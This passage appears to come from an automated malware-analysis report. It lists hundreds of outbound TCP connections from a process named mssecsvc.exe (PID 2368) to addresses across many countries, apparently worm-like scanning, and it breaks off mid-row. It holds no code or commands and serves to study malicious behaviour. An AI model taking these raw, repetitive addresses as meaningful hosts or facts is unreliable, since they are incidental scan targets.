2368 Flag of Costa Rica Costa Rica 81.9.58.165 64495 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 223.221.55.221 64496 TCP mssecsvc.exe PID: 2368 Flag of China China 168.175.213.25 64497 TCP mssecsvc.exe PID: 2368 Flag of United States United States 175.154.86.16 64498 TCP mssecsvc.exe PID: 2368 Flag of China China 41.104.111.70 64499 TCP mssecsvc.exe PID: 2368 Flag of Algeria Algeria 42.215.78.28 64500 TCP mssecsvc.exe PID: 2368 Flag of China China 192.40.139.212 64501 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 187.82.43.42 64502 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 88.224.28.219 64503 TCP mssecsvc.exe PID: 2368 Flag of Turkey Turkey 37.174.252.30 64504 TCP mssecsvc.exe PID: 2368 Flag of France France 119.206.85.73 64505 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 61.235.222.183 64506 TCP mssecsvc.exe PID: 2368 Flag of China China 190.137.229.68 64507 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 18.251.133.53 64508 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.166.0.110 64509 TCP mssecsvc.exe PID: 2368 Flag of United States United States 151.90.247.10 64510 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 22.133.129.105 64511 TCP mssecsvc.exe PID: 2368 Flag of United States United States 151.191.149.89 64512 TCP mssecsvc.exe PID: 2368 Flag of United States United States 82.83.214.172 64513 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 201.19.18.144 64514 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 109.183.162.0 64515 TCP mssecsvc.exe PID: 2368 Flag of Czech Republic Czech Republic 69.126.103.173 64516 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.85.148.206 64517 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.16.239.67 64518 TCP mssecsvc.exe PID: 2368 Flag of United States United States 219.193.78.131 64519 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 168.106.176.71 64520 TCP mssecsvc.exe PID: 2368 Flag of Hong Kong Hong Kong 152.123.133.185 64521 TCP mssecsvc.exe PID: 2368 Flag of United States United States 168.116.55.209 64522 TCP mssecsvc.exe PID: 2368 Flag of United States United States 90.146.87.8 64523 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 212.166.90.187 64524 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 106.104.80.17 64525 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 199.79.144.208 64526 TCP mssecsvc.exe PID: 2368 Flag of United States United States 80.164.2.146 64527 TCP mssecsvc.exe PID: 2368 Flag of Denmark Denmark 222.183.209.150 64528 TCP mssecsvc.exe PID: 2368 Flag of China China 122.31.67.29 64529 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 44.80.120.117 64530 TCP mssecsvc.exe PID: 2368 Flag of United States United States 159.188.165.33 64531 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.32.145.154 64532 TCP mssecsvc.exe PID: 2368 Flag of China China 215.92.49.8 64533 TCP mssecsvc.exe PID: 2368 Flag of United States United States 20.84.109.135 64534 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.250.85.3 64535 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 100.237.238.60 64536 TCP mssecsvc.exe PID: 2368 Flag of United States United States 147.9.248.157 64537 TCP mssecsvc.exe PID: 2368 Flag of United States United States 33.66.182.242 64538 TCP mssecsvc.exe PID: 2368 Flag of United States United States 53.195.112.180 64539 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 153.71.55.237 64540 TCP mssecsvc.exe PID: 2368 Flag of United States United States 107.248.184.158 64541 TCP mssecsvc.exe PID: 2368 Flag of United States United States 141.136.181.159 64542 TCP mssecsvc.exe PID: 2368 Flag of Croatia (LOCAL Name: Hrvatska) Croatia (LOCAL Name: Hrvatska) 32.208.118.230 64543 TCP mssecsvc.exe PID: 2368 Flag of United States United States 56.78.45.60 64544 TCP mssecsvc.exe PID: 2368 Flag of United States United States 73.35.67.83 64545 TCP mssecsvc.exe PID: 2368 Flag of United States United States 5.122.151.201 64546 TCP mssecsvc.exe PID: 2368 Flag of Iran (ISLAMIC Republic Of) Iran (ISLAMIC Republic Of) 196.27.65.138 64547 TCP mssecsvc.exe PID: 2368 Flag of Mauritius Mauritius 211.93.22.111 64548 TCP mssecsvc.exe PID: 2368 Flag of China China 204.95.195.29 64549 TCP mssecsvc.exe PID: 2368 Flag of United States United States 58.197.210.197 64550 TCP mssecsvc.exe PID: 2368 Flag of China China 109.232.241.48 64551 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 75.173.144.205 64552 TCP mssecsvc.exe PID: 2368 Flag of United States United States 12.38.159.33 64553 TCP mssecsvc.exe PID: 2368 Flag of United States United States 93.238.163.215 64554 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 16.246.207.49 64555 TCP mssecsvc.exe PID: 2368 Flag of United States United States 47.175.55.164 64556 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.186.227.61 64557 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 206.182.99.216 64558 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.107.20.155 64559 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 104.229.105.227 64560 TCP mssecsvc.exe PID: 2368 Flag of United States United States 136.96.19.54 64561 TCP mssecsvc.exe PID: 2368 Flag of United States United States 174.207.38.230 64562 TCP mssecsvc.exe PID: 2368 Flag of United States United States 51.139.149.100 64563 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 14.73.43.77 64564 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 94.96.74.193 64565 TCP mssecsvc.exe PID: 2368 Flag of Saudi Arabia Saudi Arabia 27.106.206.243 64566 TCP mssecsvc.exe PID: 2368 Flag of China China 175.21.13.142 64567 TCP mssecsvc.exe PID: 2368 Flag of China China 219.176.124.168 64568 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 155.59.218.59 64569 TCP mssecsvc.exe PID: 2368 Flag of New Zealand New Zealand 215.172.118.176 64570 TCP mssecsvc.exe PID: 2368 Flag of United States United States 28.119.158.35 64571 TCP mssecsvc.exe PID: 2368 Flag of United States United States 2.173.137.231 64572 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 111.30.113.63 64573 TCP mssecsvc.exe PID: 2368 Flag of China China 81.48.112.21 64574 TCP mssecsvc.exe PID: 2368 Flag of France France 105.187.50.91 64575 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 47.28.51.98 64576 TCP mssecsvc.exe PID: 2368 Flag of United States United States 70.11.244.125 64577 TCP mssecsvc.exe PID: 2368 Flag of United States United States 167.0.224.119 64578 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 201.48.85.93 64579 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 1.33.88.12 64580 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 13.162.244.79 64581 TCP mssecsvc.exe PID: 2368 Flag of United States United States 192.155.152.61 64582 TCP mssecsvc.exe PID: 2368 Flag of United States United States 157.197.156.218 64583 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 186.68.167.210 64584 TCP mssecsvc.exe PID: 2368 Flag of Ecuador Ecuador 214.29.170.143 64585 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.174.93.123 64586 TCP mssecsvc.exe PID: 2368 Flag of United States United States 81.99.226.107 64587 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 220.74.133.87 64588 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 21.109.207.91 64589 TCP mssecsvc.exe PID: 2368 Flag of United States United States 51.83.70.191 64590 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 213.1.99.216 64591 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 201.153.185.82 64592 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 28.110.40.11 64593 TCP mssecsvc.exe PID: 2368 Flag of United States United States 46.67.206.170 64594 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 45.28.87.80 64595 TCP mssecsvc.exe PID: 2368 Flag of United States United States 19.233.0.229 64596 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.204.87.133 64597 TCP mssecsvc.exe PID: 2368 Flag of United States United States 15.113.218.72 64598 TCP mssecsvc.exe PID: 2368 Flag of United States United States 178.193.142.122 64599 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 179.119.8.251 64600 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 222.100.52.142 64601 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 203.231.233.179 64602 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 101.60.92.190 64603 TCP mssecsvc.exe PID: 2368 Flag of India India 133.72.225.140 64604 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 105.165.122.240 64606 TCP mssecsvc.exe PID: 2368 Flag of Kenya Kenya 191.175.23.203 64607 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 168.3.56.90 64608 TCP mssecsvc.exe PID: 2368 Flag of United States United States 170.3.160.37 64609 TCP mssecsvc.exe PID: 2368 Flag of United States United States 214.57.236.225 64610 TCP mssecsvc.exe PID: 2368 Flag of United States United States 222.203.204.146 64611 TCP mssecsvc.exe PID: 2368 Flag of China China 33.85.207.53 64612 TCP mssecsvc.exe PID: 2368 Flag of United States United States 169.139.22.180 64613 TCP mssecsvc.exe PID: 2368 Flag of United States United States 158.181.1.202 64614 TCP mssecsvc.exe PID: 2368 Flag of Kyrgyzstan Kyrgyzstan 96.22.191.185 64615 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 52.99.40.191 64616 TCP mssecsvc.exe PID: 2368 Flag of United States United States 18.34.143.176 64617 TCP mssecsvc.exe PID: 2368 Flag of United States United States 42.51.131.158 64618 TCP mssecsvc.exe PID: 2368 Flag of China China 183.208.174.35 64619 TCP mssecsvc.exe PID: 2368 Flag of China China 63.214.201.218 64620 TCP mssecsvc.exe PID: 2368 Flag of United States United States 129.107.71.37 64621 TCP mssecsvc.exe PID: 2368 Flag of United States United States 200.0.183.28 64622 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 92.100.51.134 64623 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 47.37.75.180 64624 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.86.194.122 64625 TCP mssecsvc.exe PID: 2368 Flag of United States United States 99.208.246.16 64626 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 90.72.167.116 64627 TCP mssecsvc.exe PID: 2368 Flag of France France 86.186.189.5 64628 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 41.231.151.96 64629 TCP mssecsvc.exe PID: 2368 Flag of Tunisia Tunisia 170.133.161.1 64630 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.3.9.160 64631 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 165.24.31.209 64632 TCP mssecsvc.exe PID: 2368 Flag of United States United States 49.48.37.133 64633 TCP mssecsvc.exe PID: 2368 Flag of Thailand Thailand 85.17.223.18 64634 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 84.136.67.249 64635 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 151.79.203.143 64636 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 2.149.174.204 64637 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 140.32.87.193 64638 TCP mssecsvc.exe PID: 2368 Flag of United States United States 185.161.179.14 64639 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 102.235.188.254 64640 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 210.120.186.248 64641 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 196.59.21.145 64642 TCP mssecsvc.exe PID: 2368 Flag of Seychelles Seychelles 206.60.103.4 64643 TCP mssecsvc.exe PID: 2368 Flag of United States United States 92.2.202.26 64644 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 75.40.59.190 64645 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.137.202.196 64647 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 117.37.70.219 64648 TCP mssecsvc.exe PID: 2368 Flag of China China 188.184.230.75 64649 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 22.142.226.44 64650 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.191.0.63 64651 TCP mssecsvc.exe PID: 2368 Flag of Costa Rica Costa Rica 109.205.171.204 64652 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 193.29.180.86 64653 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 143.177.52.34 64654 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 42.204.68.105 64655 TCP mssecsvc.exe PID: 2368 Flag of China China 55.84.146.115 64656 TCP mssecsvc.exe PID: 2368 Flag of United States United States 90.136.219.253 64657 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 66.107.128.124 64658 TCP mssecsvc.exe PID: 2368 Flag of United States United States 47.44.24.211 64659 TCP mssecsvc.exe PID: 2368 Flag of United States United States 174.237.193.27 64660 TCP mssecsvc.exe PID: 2368 Flag of United States United States 86.109.146.33 64661 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 214.124.208.244 64662 TCP mssecsvc.exe PID: 2368 Flag of United States United States 194.233.71.107 64663 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 71.195.253.44 64664 TCP mssecsvc.exe PID: 2368 Flag of United States United States 118.170.192.172 64665 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 99.226.225.89 64666 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 190.247.144.182 64667 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 31.63.90.168 64668 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 206.31.64.174 64669 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.250.143.223 64670 TCP mssecsvc.exe PID: 2368 Flag of Singapore Singapore 17.101.179.145 64671 TCP mssecsvc.exe PID: 2368 Flag of United States United States 142.223.14.24 64672 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 52.105.186.121 64673 TCP mssecsvc.exe PID: 2368 Flag of United States United States 116.246.94.76 64674 TCP mssecsvc.exe PID: 2368 Flag of China China 37.227.109.254 64675 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 212.10.7.79 64676 TCP mssecsvc.exe PID: 2368 Flag of Denmark Denmark 95.219.120.141 64677 TCP mssecsvc.exe PID: 2368 Flag of Saudi Arabia Saudi Arabia 57.109.43.208 64678 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 115.127.127.56 64679 TCP mssecsvc.exe PID: 2368 Flag of Bangladesh Bangladesh 129.218.245.226 64680 TCP mssecsvc.exe PID: 2368 Flag of United States United States 57.173.98.179 64681 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 162.62.66.18 64682 TCP mssecsvc.exe PID: 2368 Flag of China China 48.188.251.130 64683 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.115.189.139 64684 TCP mssecsvc.exe PID: 2368 Flag of China China 135.24.247.46 64685 TCP mssecsvc.exe PID: 2368 Flag of United States United States 48.123.251.139 64686 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.161.72.129 64687 TCP mssecsvc.exe PID: 2368 Flag of United States United States 199.182.177.89 64688 TCP mssecsvc.exe PID: 2368 Flag of United States United States 153.120.205.137 64689 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 74.242.187.129 64690 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.155.12.201 64691 TCP mssecsvc.exe PID: 2368 Flag of United States United States 45.94.98.234 64692 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.29.143.10 64693 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 41.217.253.242 64694 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 12.120.201.150 64695 TCP mssecsvc.exe PID: 2368 Flag of United States United States 6.102.199.202 64696 TCP mssecsvc.exe PID: 2368 Flag of United States United States 86.105.223.107 64697 TCP mssecsvc.exe PID: 2368 Flag of Romania Romania 6.252.74.41 64698 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.207.231.126 64699 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.232.133.248 64700 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.110.106.159 64701 TCP mssecsvc.exe PID: 2368 Flag of China China 89.31.141.22 64702 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 132.200.216.1 64703 TCP mssecsvc.exe PID: 2368 Flag of United States United States 33.74.214.213 64704 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.102.246.74 64706 TCP mssecsvc.exe PID: 2368 Flag of United States United States 221.109.4.245 64707 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 144.204.113.62 64708 TCP mssecsvc.exe PID: 2368 Flag of France France 181.4.31.27 64709 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 114.82.124.50 64710 TCP mssecsvc.exe PID: 2368 Flag of China China 123.87.93.67 64711 TCP mssecsvc.exe PID: 2368 Flag of China China 149.203.241.17 64712 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 166.158.57.227 64713 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.211.209.127 64714 TCP mssecsvc.exe PID: 2368 Flag of United States United States 45.119.115.200 64715 TCP mssecsvc.exe PID: 2368 Flag of India India 115.48.24.245 64716 TCP mssecsvc.exe PID: 2368 Flag of China China 137.152.198.106 64717 TCP mssecsvc.exe PID: 2368 Flag of United States United States 205.231.230.193 64718 TCP mssecsvc.exe PID: 2368 Flag of United States United States 179.7.157.240 64719 TCP mssecsvc.exe PID: 2368 Flag of Peru Peru 8.187.166.153 64720 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.45.218.203 64721 TCP mssecsvc.exe PID: 2368 Flag of United States United States 23.22.125.120 64722 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.134.15.150 64723 TCP mssecsvc.exe PID: 2368 Flag of United States United States 144.34.130.222 64724 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.253.41.50 64725 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 134.51.24.73 64726 TCP mssecsvc.exe PID: 2368 Flag of United States United States 41.13.78.31 64727 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 85.161.12.156 64728 TCP mssecsvc.exe PID: 2368 Flag of Czech Republic Czech Republic 166.108.185.188 64729 TCP mssecsvc.exe PID: 2368 Flag of United States United States 163.71.175.200 64730 TCP mssecsvc.exe PID: 2368 Flag of France France 143.230.162.88 64731 TCP mssecsvc.exe PID: 2368 Flag of United States United States 59.240.75.49 64732 TCP mssecsvc.exe PID: 2368 Flag of China China 114.165.249.94 64733 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 215.186.47.129 64734 TCP mssecsvc.exe PID: 2368 Flag of United States United States 141.187.97.133 64735 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.75.194.37 64736 TCP mssecsvc.exe PID: 2368 Flag of United States United States 162.175.46.20 64737 TCP mssecsvc.exe PID: 2368 Flag of United States United States 108.82.87.205 64738 TCP mssecsvc.exe PID: 2368 Flag of United States United States 27.243.183.109 64739 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 37.20.166.233 64740 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 116.20.123.180 64741 TCP mssecsvc.exe PID: 2368 Flag of China China 58.214.247.28 64742 TCP mssecsvc.exe PID: 2368 Flag of China China 119.239.163.144 64743 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 61.181.130.87 64744 TCP mssecsvc.exe PID: 2368 Flag of China China 88.88.206.171 64745 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 138.24.3.232 64746 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 97.48.210.237 64747 TCP mssecsvc.exe PID: 2368 Flag of United States United States 136.91.202.110 64748 TCP mssecsvc.exe PID: 2368 Flag of United States United States 133.249.176.64 64749 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 33.199.158.2 64750 TCP mssecsvc.exe PID: 2368 Flag of United States United States 9.178.26.207 64751 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.33.206.126 64752 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.111.192.14 64753 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 48.188.213.34 64754 TCP mssecsvc.exe PID: 2368 Flag of United States United States 98.226.230.6 64755 TCP mssecsvc.exe PID: 2368 Flag of United States United States 126.95.99.245 64756 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 81.82.200.51 64757 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 77.65.32.153 64758 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 8.177.160.185 64759 TCP mssecsvc.exe PID: 2368 Flag of United States United States 140.217.182.223 64760 TCP mssecsvc.exe PID: 2368 Flag of United States United States 11.218.142.180 64761 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.4.165.112 64762 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 5.136.26.211 64763 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 88.219.132.205 64764 TCP mssecsvc.exe PID: 2368 Flag of France France 101.12.62.74 64765 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 61.118.134.212 64766 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 73.111.184.254 64767 TCP mssecsvc.exe PID: 2368 Flag of United States United States 207.136.29.181 64768 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 195.104.53.122 64769 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 200.161.195.104 64770 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 71.198.148.146 64771 TCP mssecsvc.exe PID: 2368 Flag of United States United States 107.129.134.49 64772 TCP mssecsvc.exe PID: 2368 Flag of United States United States 163.15.26.215 64773 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 43.56.218.31 64774 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 218.170.0.45 64775 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 78.108.113.91 64776 TCP mssecsvc.exe PID: 2368 Flag of European Union European Union 126.59.178.162 64777 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 123.79.246.188 64778 TCP mssecsvc.exe PID: 2368 Flag of China China 44.74.242.7 64779 TCP mssecsvc.exe PID: 2368 Flag of United States United States 64.87.154.152 64780 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 42.197.163.232 64781 TCP mssecsvc.exe PID: 2368 Flag of China China 173.204.141.49 64782 TCP mssecsvc.exe PID: 2368 Flag of United States United States 17.27.115.102 64783 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.181.226.39 64784 TCP mssecsvc.exe PID: 2368 Flag of Cote D'ivoire Cote D'ivoire 178.187.160.217 64785 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 124.105.49.86 64786 TCP mssecsvc.exe PID: 2368 Flag of Philippines Philippines 93.117.102.96 64787 TCP mssecsvc.exe PID: 2368 Flag of Iran (ISLAMIC Republic Of) Iran (ISLAMIC Republic Of) 17.216.228.243 64788 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.143.190.248 64789 TCP mssecsvc.exe PID: 2368 Flag of United States United States 207.82.183.82 64790 TCP mssecsvc.exe PID: 2368 Flag of United States United States 198.124.20.73 64791 TCP mssecsvc.exe PID: 2368 Flag of United States United States 74.197.85.210 64792 TCP mssecsvc.exe PID: 2368 Flag of United States United States 182.204.76.89 64793 TCP mssecsvc.exe PID: 2368 Flag of China China 22.253.253.38 64794 TCP mssecsvc.exe PID: 2368 Flag of United States United States 196.105.53.121 64795 TCP mssecsvc.exe PID: 2368 Flag of Kenya Kenya 222.158.96.119 64796 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 133.142.74.54 64797 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 125.88.194.169 64798 TCP mssecsvc.exe PID: 2368 Flag of China China 193.229.239.90 64799 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 2.212.202.9 64800 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 123.102.42.34 64801 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 87.71.159.84 64802 TCP mssecsvc.exe PID: 2368 Flag of Israel Israel 177.251.53.51 64803 TCP mssecsvc.exe PID: 2368 Flag of Paraguay Paraguay 6.226.197.84 64804 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.212.205.44 64805 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 17.73.168.56 64806 TCP mssecsvc.exe PID: 2368 Flag of United States United States 114.49.193.42 64807 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 59.58.189.227 64808 TCP mssecsvc.exe PID: 2368 Flag of China China 38.116.26.147 64809 TCP mssecsvc.exe PID: 2368 Flag of United States United States 144.244.185.162 64810 TCP mssecsvc.exe PID: 2368 Flag of United States United States 82.11.16.127 64811 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 196.21.31.82 64812 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 80.150.51.95 64813 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 143.51.232.64 64814 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 93.133.219.92 64815 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 147.62.91.93 64816 TCP mssecsvc.exe PID: 2368 Flag of United States United States 104.220.88.26 64817 TCP mssecsvc.exe PID: 2368 Flag of United States United States 40.38.134.62 64818 TCP mssecsvc.exe PID: 2368 Flag of United States United States 107.100.112.184 64819 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.131.65.143 64820 TCP mssecsvc.exe PID: 2368 Flag of United States United States 105.249.107.84 64821 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 164.77.19.55 64822 TCP mssecsvc.exe PID: 2368 Flag of Chile Chile 60.43.220.58 64823 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 147.213.64.14 64824 TCP mssecsvc.exe PID: 2368 Flag of Slovakia (SLOVAK Republic) Slovakia (SLOVAK Republic) 61.155.83.237 64825 TCP mssecsvc.exe PID: 2368 Flag of China China 161.145.180.205 64826 TCP mssecsvc.exe PID: 2368 Flag of United States United States 193.87.133.24 64827 TCP mssecsvc.exe PID: 2368 Flag of Slovakia (SLOVAK Republic) Slovakia (SLOVAK Republic) 204.56.106.219 64828 TCP mssecsvc.exe PID: 2368 Flag of United States United States 181.244.159.191 64829 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 166.208.122.83 64830 TCP mssecsvc.exe PID: 2368 Flag of United States United States 48.48.237.142 64831 TCP mssecsvc.exe PID: 2368 Flag of United States United States 18.11.220.238 64832 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.47.181.172 64833 TCP mssecsvc.exe PID: 2368 Flag of United States United States 29.96.65.252 64834 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.166.198.215 64835 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 221.124.222.22 64836 TCP mssecsvc.exe PID: 2368 Flag of Hong Kong Hong Kong 177.183.91.115 64837 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 152.15.5.53 64838 TCP mssecsvc.exe PID: 2368 Flag of United States United States 151.101.7.233 64839 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.30.67.99 64840 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 13.11.242.240 64841 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.23.215.51 64842 TCP mssecsvc.exe PID: 2368 Flag of United States United States 159.233.165.30 64843 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.37.98.101 64844 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.131.28.77 64845 TCP mssecsvc.exe PID: 2368 Flag of United States United States 39.68.38.48 64846 TCP mssecsvc.exe PID: 2368 Flag of China China 196.81.193.184 64847 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 209.216.208.23 64848 TCP mssecsvc.exe PID: 2368 Flag of United States United States 101.186.131.65 64849 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 140.85.217.49 64851 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 23.62.18.61 64852 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.222.103.172 64853 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 117.249.3.106 64854 TCP mssecsvc.exe PID: 2368 Flag of India India 184.122.166.147 64855 TCP mssecsvc.exe PID: 2368 Flag of United States United States 135.189.3.5 64856 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.11.213.2 64857 TCP mssecsvc.exe PID: 2368 Flag of United States United States 29.89.139.3 64858 TCP mssecsvc.exe PID: 2368 Flag of United States United States 150.190.72.189 